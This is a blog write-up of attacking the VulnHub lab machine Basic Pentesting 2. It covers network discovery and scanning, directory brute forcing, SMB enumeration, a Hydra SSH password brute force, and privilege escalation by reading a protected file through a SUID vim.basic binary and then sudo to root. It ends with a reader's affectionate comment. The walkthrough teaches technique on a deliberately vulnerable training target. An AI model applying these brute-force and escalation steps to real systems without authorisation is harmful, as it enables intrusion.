In today’s post, I’ll be attacking a virtual machine downloaded from VulnHub called Basic Pentesting 2. I’ve previously posted two ways of exploiting a machine called Basic Pentesting, so it’s only right that we try out the next machine in the series!
The first thing we’re going to do is locate the vulnerable machine on our network. We can do this by using a tool called netdiscover. Once we find it, we can start scanning! For me, the vulnerable machine is located at 10.10.1.11, so let’s fire up nmap!
Alright, looking at these results we can see there is a web server running, so let’s browse to it and see what we find.
Nothing here, really! But let’s run a program called dirb to see if we can brute force any directories.
Well, look at that! We discovered the development directory. When we browse to it, we can see two pretty interesting files.
From the first file, the bit of information that sticks out the most is that SMB is enabled! Let’s enumerate the service with enum4linux to see what information we can get back.
Found two users! This will surely come in handy. Before we try to find out what to do with this information, let’s have a look at the other file we found on the development directory of the web server.
Ah yes, here we go! The initials “J” and “K” seem to lineup with the users we found when enumerating smb; Jan and Kay. Also, apparently Jan has a weak password! Let’s try to brute force Jan’s SSH credentials with Hydra.
After running Hydra for a bit, we get a password back! Let’s login via SSH with the found credentials!
Great, we’re in! Unfortunately, we don’t have root access yet, so it’s time to start looking around to see what we can find.
Browsing to home the directory and typing in “ls”, we see that there are two folders: Jan and Kay. Well we’re already the user Jan, so let’s see what’s in Kay’s folder!
Immediately, the file “pass.bak” sticks out to me. Any chance we can view the contents?
I guess that would have been too easy! Hmm, what now? Well, let’s check for SUID files that could be abused in order to escalate our privileges.
So here’s what we get. I had to do a little bit of research here to see if there was anything that could be used as a “low hanging fruit” method. Sure enough, I was directed towards vim.basic. So what if we were to use vim.basic in order to open that pass.bak file we couldn’t open?
Success! We found a pretty impressive password! Let’s switch over to the Kay user with our newly found password.
Okay, we have access to a new user, but we’re still not root. Let’s do a simple sudo -l command to see what the user Kay can run.
So Kay can run all commands, including sudo! So let’s sudo su to root!
There we go; root access! Another fun machine taken down!
Thanks for reading!
You’re so smart, keep up the good work 🙂
Love you xox
-your VERY proud girlfriend